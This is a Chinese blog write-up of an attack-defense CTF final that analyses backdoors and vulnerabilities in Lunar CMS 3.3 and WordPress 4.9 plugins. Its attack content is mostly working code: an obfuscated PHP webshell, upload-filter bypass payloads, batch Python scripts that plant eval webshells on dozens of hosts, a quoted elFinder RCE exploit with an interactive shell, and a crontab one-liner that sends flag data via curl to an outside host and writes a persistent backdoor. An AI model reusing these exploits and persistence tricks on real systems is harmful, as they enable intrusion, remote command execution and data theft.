“鵬城杯”決賽web源碼分析&穩(wěn)定自動化上分之路

前言

賽后聽說是決賽平臺屬于第一次使用墓毒,不知道是否有測試過,反正個人體驗不是太好亲怠,不過第一次使用來講所计,應(yīng)該還算不錯,還有很大發(fā)展空間嘛团秽。主要寫兩個php站的源碼分析主胧, 第一個web是 Lunar CMS 3.3 提取碼: qqmg,第二個是 Woredpress 4.9 提取碼: xwqh

1. Lunar CMS 源碼分析

拿到攻防賽源碼一般先甩查殺軟件查殺一番习勤,然后用對應(yīng)版本源碼Diff一下踪栋,這樣這可很快分析出代碼哪些地方有修改過(一般修改過的地方就是預(yù)設(shè)的漏洞了),否則那就是直接用版本CVE打了图毕。源碼在比賽平臺爆炸之前拿到的夷都,半個小時寫好了三個洞的Exp,本以為穩(wěn)如老狗予颤,沒想到平臺恢復(fù)時不提前說一聲囤官,本菜還在紅警中,等退出紅警蛤虐,都被神仙提權(quán)了党饮。

#0x01 變形后門

甩 Webshellkill 查殺一番,本菜的Webshellkill行為庫是20181129的驳庭,怎么說還是蠻新的
Webshellkill查殺

Webshellkill 檢測出的可疑文件是原版中自帶的代碼文件刑顺,所以先不管這個文件,用Diff工具對題目源碼和LunarCMS 3.3左右的版本的源碼進(jìn)行對比嚷掠。
admin/tool.php

在admin目錄下多了一個tool.php文件捏检,看代碼很明顯一個預(yù)留的后面,竟然還過了Webshellkill的查殺不皆,果斷收集一只免殺馬贯城。

tool.php:

<?php
class Foo
{
    function Variable($c)
    {
        $name = 'Bar';
        $b=$this->$name(); // This calls the Bar() method
        $b($c);
    }
    function Bar()
    {
        $__='a';
        $a1=$__; 
        $__++;$__++;$__++;$__++;
        $a2=$__; 
        $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
        $a3=$__++; 
        $a4=$__++; 
        $a5=$__; 
        $a=$a1.$a4.$a4.$a2.$a3.$a5; 
        return $a;
    }
}
function variable(){
    $_='A';
    $_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
    $b1=$_++; 
    $b2=$_; 
    $_++;$_++;$_++;
    $b3=$_++; 
    $b4=$_; 
    $b='_'.$b2.$b1.$b3.$b4; 
    return $b;
}
$foo = new Foo();
$funcname = "Variable";
$bb=${variable()}[variable()];
$foo->$funcname($bb);   

靜態(tài)調(diào)試下后門代碼,分別把$a和$b給打印出來
靜態(tài)調(diào)試

所以拼接起來也就是一個簡單的一句話木馬,就不貼Exp了

assert($_POST[_POST])

#0x02 預(yù)設(shè)的任意文件上傳

寫好后門利用的Exp腳本后驼侠,繼續(xù)Diff文件,在admin目錄下多了一個certificate文件夾
文件上傳點

本以為這是一個插件什么的杠人,查看代碼發(fā)現(xiàn)是一個任意文件上傳點踩晶,做了點點過濾

index.php

<?php
function source() {
        highlight_file(__FILE__);
    }
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <title>文件上傳</title>
    <link href="./bootstrap.min.css" rel="stylesheet">
  </head>
  <body>
    <script src="./jquery.min.js"></script>
    <script>
      $(document).ready(function() {
        $('#selectFile').on('click', function() { $('#file').trigger('click') });
        $('#file').change(function() { $('#selectedFile').val($(this).val()) });
      });
    </script>
    <div class="container">
      <div class="row">
        <div class="col-lg-12">
          <h1>文件上傳</h1>
          <form method="post" enctype="multipart/form-data" class="form">
            <input type="file" name="file" id="file" style="display: none;">
            <div class="input-group">
              <input type="text" class="form-control" id="selectedFile" readonly>
              <span class="input-group-btn" style="width:200px">
                <button id="selectFile" class="btn btn-defdault" type="button" style="margin-right:5px;">選擇文件</button>
                <input type="submit" value="upload" class="btn btn-primary">
              <span>
            </div>

          </form>

<?php
  if($_SERVER["REQUEST_METHOD"] === "POST") :
?>
<?php
    if (is_uploaded_file($_FILES["file"]["tmp_name"])):
      $file = $_FILES['file'];
      $name = $file['name'];
      if (preg_match("/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$/", $name) ):
        $data = file_get_contents($file['tmp_name']);
        while($next = preg_replace("/<\\?/", "", $data)){
          $next = preg_replace("/php/", "", $next);
          if($data === $next) {
              break;
          }
          source();
          $data = $next;
        }
        file_put_contents(dirname(__FILE__) . '/u/' . $name, $data);
        chmod(dirname(__FILE__) . '/u/' . $name, 0644);
?>
        <div>
          <a href="<?php echo htmlspecialchars("u/" . $name)?>">上傳成功!</a>
        </div>
<?php
      endif;
    endif;
?>
<?php
  endif;
?>
        </div>
      </div>
    </div>
  </body>
</html>

分析主體代碼执泰,這個上傳點寫得比較簡單
index.php

上傳沒有對文件后綴進(jìn)行校驗,所以可以直接上傳php文件渡蜻,對上傳文件內(nèi)容進(jìn)行了校驗术吝,只校驗了' <? '和' php ',并且對 php 校驗沒有使用 /i ,也就是只校驗小寫的 php ,所以利用 pHp,就可以直接繞過,而對于' <? '繞過的方式也特別多茸苇,比如利用' <= ' 或者用

<script language='pHp'>eval($_POST[Cyc1e])</script>

便可以繞過檢測排苍,上傳木馬利用,所以可以寫批量攻擊的Exp

Exp_upload.py

# -*- coding: utf-8 -*-
# @Author: Administrator
# @Date:   2018-12-07 16:17:39
# @Last Modified by:   Cyc1e
# @Last Modified time: 2018-12-07 23:26:08
import requests
import re
from time import sleep

def submit_cookie(answer):
    #test = "gongfan_flag\{10848bd4d2318970279b6c124866bcdc5a04ca50eaaaf92c6cf0021754ae43e6\}"
    submit_ip = '172.91.1.12:9090'
    urls='http://%s/ad/hacker/submit/submitCode'% submit_ip
    post = {'flag':answer}
    '''cmder = ' %s -b "JSESSIONID=C64DD133EFDDB22CE5BE4CA3991AB6DF" -d "flag=%s"'% (urls,answer)
                #print cmd
                os.system('curl ' + cmder)'''

    header = {'Host': '172.91.1.12:9090',
              'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Accept': 'application/json, text/javascript, */*; q=0.01',
              'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
              'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
              'X-Requested-With': 'XMLHttpRequest',
              'Referer': 'http://172.91.1.12:9090/arace/index',
              'Content-Length': '14',
              'Cookie': 'JSESSIONID=51EF0ADB25F425E2BE7C5871C29B1D7A'}
    req = requests.post(urls,headers = header,data=post)
    print req.content
    if 'errorInfo' not in req.content:
        print ' ' + req.content

files = {'file': open('pm.php', 'rb')}

lists = {'172.91.0.101','172.91.0.104','172.91.0.106','172.91.0.112','172.91.0.115','172.91.0.116','172.91.0.122','172.91.0.125','172.91.0.135','172.91.0.138','172.91.0.144','172.91.0.18','172.91.0.33','172.91.0.34','172.91.0.35','172.91.0.42','172.91.0.44','172.91.0.45','172.91.0.47','172.91.0.51','172.91.0.53','172.91.0.54','172.91.0.59','172.91.0.60','172.91.0.61','172.91.0.62','172.91.0.64','172.91.0.68','172.91.0.69','172.91.0.70','172.91.0.78','172.91.0.82','172.91.0.87','172.91.0.88','172.91.0.91','172.91.0.92','172.91.0.93','172.91.0.94','172.91.0.97','172.91.0.99'}
cmd = 'cat /flag/flag.txt'
#cmd = 'dir'
#submit_cookie(111,'asdadasd')
while True:
    for ip in lists:
        #ip = '127.0.0.1/pcb/html/'
        print ip
        url = 'http://%s:8080/admin/certificate/index.php'% ip
        url1 = 'http://%s:8080/admin/certificate/u/pm.php'% ip
        #shell_data = {'pass':'BOI_youcanyoujump','shy':'system("' + cmd + '");'}
        shell_data = {'Cyc1e':'system("' + cmd + '");'}
        try:
            req2 = requests.get(url1,timeout=0.5)
            if req2.status_code != 200:
                req = requests.post(url = url,files = files,timeout=0.5)
            req3 = requests.get(url1,timeout=0.5)
            if req3.status_code == 200:
                print url1
                req1 = requests.post(url = url1,data = shell_data,timeout=0.5)
                print req1.content
            #submit_cookie(req1.content)
        except:
            sleep(0.5)
    sleep(60)

pm.php <script language='pHp'>eval($_POST[Cyc1e])</script>

#0x03 版本 RCE 漏洞利用

繼續(xù)Diff文件發(fā)現(xiàn)并沒有添加其他的異常代碼和文件学密,所以Diff也就只可以發(fā)現(xiàn)這兩個利用點淘衙,那么接下來要找的就是 Lunar CMS 3.3 版本是否存在版本漏洞,而3.3版本恰好存在一個RCE利用點腻暮,參考文章:https://www.exploit-db.com/exploits/33867彤守,文章里的有寫好的EXP

#!/usr/bin/env python
#......
#
# Tested on: Apache/2.4.7 (Win32)
#            PHP/5.5.6
#            MySQL 5.6.14
#......
import cookielib, urllib
import urllib2, sys, os

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 4:
    print '\n\x20\x20[*] Usage: '+piton+' <hostname> <path> <filename.php>\n'
    print '\x20\x20[*] Example: '+piton+' zeroscience.mk lunarcms backdoor.php\n'
    sys.exit()

host = sys.argv[1]
path = sys.argv[2]
fname = sys.argv[3]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

create = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php?cmd=mkfile&name='+fname+'&target=l1_XA')
#print create.read()

payload = urllib.urlencode({
                            'cmd' : 'put',
                            'target' : 'l1_'+fname.encode('base64','strict'),
                            'content' : '<?php passthru($_GET[\'cmd\']); ?>'
                            })

write = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php', payload)
#print write.read()
print '\n'
while True:
    try:
        cmd = raw_input('shell@'+host+':~# ')

        execute = opener.open('http://'+host+'/'+path+'/files/'+fname+'?cmd='+urllib.quote(cmd))
        reverse = execute.read()
        print reverse;
        
        if cmd.strip() == 'exit':
            break

    except Exception:
        break

sys.exit()

對php環(huán)境有所要求,在 php/5.5.6一下版本是測試成功的哭靖,不過剛好具垫,服務(wù)器的php環(huán)境是可以利用該漏洞的,對于攻防賽而言试幽,需要將腳本進(jìn)行修改做修,利用requests庫進(jìn)行重寫

Exp_RCE.py

#!/usr/bin/env python
import requests
import sys
from time import sleep
import re

def submit_cookie(answer):
    #test = "gongfan_flag\{10848bd4d2318970279b6c124866bcdc5a04ca50eaaaf92c6cf0021754ae43e6\}"
    submit_ip = '172.91.1.12:9090'
    urls='http://%s/ad/hacker/submit/submitCode'% submit_ip
    post = {'flag':answer}
    '''cmder = ' %s -b "JSESSIONID=C64DD133EFDDB22CE5BE4CA3991AB6DF" -d "flag=%s"'% (urls,answer)
                #print cmd
                os.system('curl ' + cmder)'''

    header = {'Host': '172.91.1.12:9090',
              'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Accept': 'application/json, text/javascript, */*; q=0.01',
              'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
              'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
              'X-Requested-With': 'XMLHttpRequest',
              'Referer': 'http://172.91.1.12:9090/arace/index',
              'Content-Length': '14',
              'Cookie': 'JSESSIONID=51EF0ADB25F425E2BE7C5871C29B1D7A'}

    req = requests.post(urls,headers = header,data=post)
    print req.content
    if 'errorInfo' not in req.content:
        print ' ' + req.content


fname = 'shell.php'
payload = {
                'cmd' : 'put',
                'target' : 'l1_'+fname.encode('base64','strict'),
                'content' : '<?php passthru($_GET[\'cmd\']); ?>'
                }
cmd = 'cat /flag/flag.txt'
lists = {'172.91.0.101','172.91.0.104','172.91.0.106','172.91.0.112','172.91.0.115','172.91.0.116','172.91.0.122','172.91.0.125','172.91.0.135','172.91.0.138','172.91.0.144','172.91.0.18','172.91.0.33','172.91.0.34','172.91.0.35','172.91.0.42','172.91.0.44','172.91.0.45','172.91.0.47','172.91.0.51','172.91.0.53','172.91.0.54','172.91.0.59','172.91.0.60','172.91.0.61','172.91.0.62','172.91.0.64','172.91.0.68','172.91.0.69','172.91.0.70','172.91.0.78','172.91.0.82','172.91.0.87','172.91.0.88','172.91.0.91','172.91.0.92','172.91.0.93','172.91.0.94','172.91.0.97','172.91.0.99'}

mat = re.compile(".*([0-9a-z]{192}).*")
while True:
    for i in lists:
        host = i
        #host = '127.0.0.1/CMS/LunarCMS-master/'
        print host
        try:
            url = 'http://'+host+':8080/admin/includes/elfinder/php/connector.php?cmd=mkfile&name=' + fname + '&target=l1_XA'
            create = requests.get(url,timeout = 1)
            url2 = 'http://'+host+':8080/admin/includes/elfinder/php/connector.php'
            write = requests.post(url2, data = payload,timeout = 1)
            url3 = 'http://'+host+':8080/files/'+fname+'?cmd='+ cmd

            execute = requests.get(url3,timeout = 0.5)
            reverse = execute.content
            print reverse
            flag = mat.findall(reverse)[0]
            print flag
            if len(flag) > 0 :
                submit_cookie(flag)
        except Exception:
            pass
        sleep(0.5)
    sleep(30)

2. Wordpress源碼分析

Wordpress是4.9版本,下載源碼的發(fā)現(xiàn)50多M抡草,那很明顯是安裝了一些插件了(框架源碼20多M),本菜主要還是利用Wordpress上的分蔗坯,畢竟第一天在Lunar CMS上翻車了康震,得靠第二天翻盤一下。

#0x01 普普通通的一句話后門

大師傅們問我怎么第一輪就開打了(5分鐘一輪)宾濒,可能我網(wǎng)速比較快吧腿短。邊下載源碼邊往 Webshellkill 甩,很成功的掃到了一個一句話木馬

后門

我本以為又可以收一個高大上的馬了绘梦,點開一看 <?php @eval($_POST['1']);?> 直接修改第一天的Exp就開打了橘忱,所以速度快了點,操作這么快自然不可能只用來讀flag卸奉,肯定要干些其他的事钝诚,后面寫。

#0x02 Site Import插件本地和遠(yuǎn)程文件包含漏洞

這個洞一下沒有發(fā)現(xiàn)榄棵,被打了好幾輪凝颇,漏洞點在/wp-content/plugins/site-import/admin/page.php

<?php

    namespace site_import_namespace;

    $page = $_GET['url'];
    $url = parse_url($page);
    $url['path'] = pathinfo(isset($url['path'])?$url['path']:'');
    if(!isset($url['path']['dirname']) || $url['path']['dirname']=='\\')$url['path']['dirname'] = '/';
    //if($url['path']['dirname'][strlen($url['path']['dirname'])-1]!='/')$url['path']['dirname'] .= '/';

    function change_link($text){
        ......
    }

    function change_link_2($text){
               ......
    }
    
    $context = stream_context_create(array('http' => array('max_redirects' => 101)));
    $content = file_get_contents($page, false, $context);
    $content = preg_replace_callback("/(\<(img|link|a) [^\>]*?)(href|src)\=\"([^\"]+?)\"/", 'site_import_namespace\change_link', $content);

    echo $content;
?>

很明顯潘拱,沒有對$page變量做任何處理就直接傳到了file_get_contents()函數(shù)中,直接導(dǎo)致了文件包含拧略,構(gòu)造/page.php?url=../../../../../../../../../flag就好了芦岂,這里就不貼Exp了

#0x03 simple-ads-manager 插件中的SQL注入漏洞

這個漏洞在這次利用價值不大,畢竟注入出來的都是加密的垫蛆,注入的流量到處飛禽最,有些隊都把數(shù)據(jù)庫給關(guān)了 - -.. ,看不懂的操作袱饭,這里不過多說明了川无,可以參考:https://www.exploit-db.com/exploits/36613 進(jìn)行復(fù)現(xiàn)測試。

3. 簡單分享分享這次的打法

第一天的就不寫了宁赤,主要上分在于第二天舀透,最后 Web3 拿了3800多分,還算不錯的决左,主要因為操作失誤愕够,應(yīng)該是能夠那 4000+ 的分的,由于比較快掃到了 Wordpress 中的一句話木馬佛猛,所以立即連接木馬惑芭,批量插入了Crontab定時任務(wù),利用木馬直接調(diào)用 system() 函數(shù)继找,嵌入反彈flag的定時任務(wù)遂跟,不管對方怎么補漏洞,一樣能很輕松的拿到 flag 的(本菜第一次線下的時候被一白師傅這樣打蒙了

system('echo \"* * * * * cat /flag/flag.txt | curl http://172.91.0.115:3001/flag --data-binary @- \n* * * * * echo \\\"<?php \\\\\\n if(@md5(\\\\\\\$_POST[pass])==\\\\\\\"03ae84723832951e7a85a81d9c38a76a\\\\\\\"){@eval(\\\\\\\$_POST[\"1\"]);} \\\\\\n \\\" > /var/www/html/Cyc1e.php \" | crontab')

一共植入了兩條定時任務(wù)(按個人需求植入)婴渡,第一個定時任務(wù)是每個一分鐘帶著flag幻锁,post請求我本地開啟的3001端口的web服務(wù)一次,所以就坐著收flag就好了边臼,第二個定時任務(wù)是往網(wǎng)站根木馬寫馬哄尔,植入的效果 ↓ ↓ ↓


crontab服務(wù)

所以本地起個flask服務(wù)(比較好自動化提交flag和設(shè)定端口),接受 flag 并自動提交就好了柠并,大師傅們問沒有權(quán)限怎么執(zhí)行crontab岭接,crontab不需要root權(quán)限的,什么用戶起的就是什么權(quán)限臼予,所以www-data用戶注上命令鸣戴,需要本地上個 shell 去kill才行的。


Flask服務(wù)

這里放一下一白大師傅寫的起flask服務(wù)的腳本(修改版)

# - coding:utf8
from flask import *
import requests

app = Flask(__name__)

url = "http://172.91.1.12:9090/arace/index" 
token = "0ade4d3d8b7ed42f"

server_port = 3001


def submit_token(url,answer,token):
    data ={"token":token,"flag":answer}
    resp = requests.post(url,data=data)
    if (resp.status_code != "404"):
        print "Status code:%d"%(resp.status_code)

def submit_cookie(ip,answer):
    submit_ip = '172.91.1.12:9090'
    urls='http://%s/ad/hacker/submit/submitCode'% submit_ip
    post = {'flag':answer}
    '''cmder = ' %s -b "JSESSIONID=C64DD133EFDDB22CE5BE4CA3991AB6DF" -d "flag=%s"'% (urls,answer)
                #print cmd
                os.system('curl ' + cmder)'''

    header = {'Host': '172.91.1.12:9090',
              'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Accept': 'application/json, text/javascript, */*; q=0.01',
              'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
              'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
              'X-Requested-With': 'XMLHttpRequest',
              'Referer': 'http://172.91.1.12:9090/arace/index',
              'Content-Length': '14',
              'Cookie': 'JSESSIONID=77A0AFA7757CE43018889FCF9AAFE59A'}

    req = requests.post(urls,headers = header,data=post)
    print req.content
    if 'errorInfo' not in req.content:
        print ' ' + req.content


last_flag = {}


@app.route('/flag', methods=['POST'])
def receive_flag():
    flag = request.get_data().strip()
    ip = request.remote_addr
    if not last_flag.has_key(ip):
        last_flag[ip] = set()
    ip_flag_list = last_flag.get(ip, set())
    if flag in ip_flag_list:
        print "Receive %s from %s , already submitted." % (flag, ip)
        return ""
    ip_flag_list.add(flag)
    result = ""
    print "\nReceive from : %s\nflag : %s"% (ip,flag)
    submit_cookie(ip,flag)
    return ''


if __name__ == '__main__':
    app.run("0.0.0.0", port=server_port)

總結(jié)

能力有限粘拾,可能有的洞沒有分析出來窄锅。本想用一只剛寫的病毒性后門來試試的,這次還沒有實驗缰雇,等后續(xù)在攻防賽中實驗成功后再公開酬滤。本菜第二天由于操作失誤签餐,第一波拿flag命令輸入成了cat /flag,然而flag在 /flag/flag.txt 了盯串,等到第二波注入任務(wù)時氯檐,掉了好多,所以到最后還是接收了一大堆空字符過來体捏,而且寫馬的目錄還寫錯了冠摄,真的是讓人頭禿,被大師傅們笑死几缭,血虧河泳。同時開場用shell批量執(zhí)行命令,其他的惡劣操作就不寫了年栓,怕被打死拆挥。放一張最終成績圖

最后成績

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市某抓,隨后出現(xiàn)的幾起案子纸兔,更是在濱河造成了極大的恐慌,老刑警劉巖否副,帶你破解...
    沈念sama閱讀 206,126評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件汉矿,死亡現(xiàn)場離奇詭異,居然都是意外死亡备禀,警方通過查閱死者的電腦和手機洲拇,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,254評論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來曲尸,“玉大人赋续,你說我怎么就攤上這事×砘迹” “怎么了蚕捉?”我有些...
    開封第一講書人閱讀 152,445評論 0 341
  • 文/不壞的土叔 我叫張陵,是天一觀的道長柴淘。 經(jīng)常有香客問我,道長秘通,這世上最難降的妖魔是什么为严? 我笑而不...
    開封第一講書人閱讀 55,185評論 1 278
  • 正文 為了忘掉前任,我火速辦了婚禮肺稀,結(jié)果婚禮上第股,老公的妹妹穿的比我還像新娘。我一直安慰自己话原,他們只是感情好夕吻,可當(dāng)我...
    茶點故事閱讀 64,178評論 5 371
  • 文/花漫 我一把揭開白布诲锹。 她就那樣靜靜地躺著,像睡著了一般涉馅。 火紅的嫁衣襯著肌膚如雪归园。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 48,970評論 1 284
  • 那天稚矿,我揣著相機與錄音庸诱,去河邊找鬼。 笑死晤揣,一個胖子當(dāng)著我的面吹牛桥爽,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播昧识,決...
    沈念sama閱讀 38,276評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼钠四,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了跪楞?” 一聲冷哼從身側(cè)響起缀去,我...
    開封第一講書人閱讀 36,927評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎习霹,沒想到半個月后朵耕,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,400評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡淋叶,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,883評論 2 323
  • 正文 我和宋清朗相戀三年阎曹,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片煞檩。...
    茶點故事閱讀 37,997評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡处嫌,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出斟湃,到底是詐尸還是另有隱情熏迹,我是刑警寧澤,帶...
    沈念sama閱讀 33,646評論 4 322
  • 正文 年R本政府宣布凝赛,位于F島的核電站注暗,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏墓猎。R本人自食惡果不足惜捆昏,卻給世界環(huán)境...
    茶點故事閱讀 39,213評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望毙沾。 院中可真熱鬧骗卜,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,204評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至遍烦,卻和暖如春俭嘁,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背乳愉。 一陣腳步聲響...
    開封第一講書人閱讀 31,423評論 1 260
  • 我被黑心中介騙來泰國打工兄淫, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人蔓姚。 一個月前我還...
    沈念sama閱讀 45,423評論 2 352
  • 正文 我出身青樓捕虽,卻偏偏與公主長得像,于是被迫代替她去往敵國和親坡脐。 傳聞我的和親對象是個殘疾皇子泄私,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,722評論 2 345

推薦閱讀更多精彩內(nèi)容

  • WEB2 看源代碼得flag 文件上傳測試 找一張圖片上傳,截包改后綴名為.php得flag 計算題 F12修改輸...
    a2dd56f6ad89閱讀 18,492評論 0 2
  • 一套實用的滲透測試崗位面試題备闲,你會嗎晌端? 1.拿到一個待檢測的站,你覺得應(yīng)該先做什么恬砂? 收集信息 whois咧纠、網(wǎng)站源...
    g0閱讀 4,812評論 0 9
  • 紅塵滾滾多少夢,化作清酒灌入喉泻骤。 酸甜苦辣自體會漆羔,歲月匆匆難停留。
    蠻力閱讀 493評論 0 13
  • 一 : 迭代器協(xié)議簡述 : 迭代器協(xié)議是指,對象必須提供一個next方法,執(zhí)行該方法要么返回迭代中的下一項,要么就...
    TianTianBaby223閱讀 559評論 0 0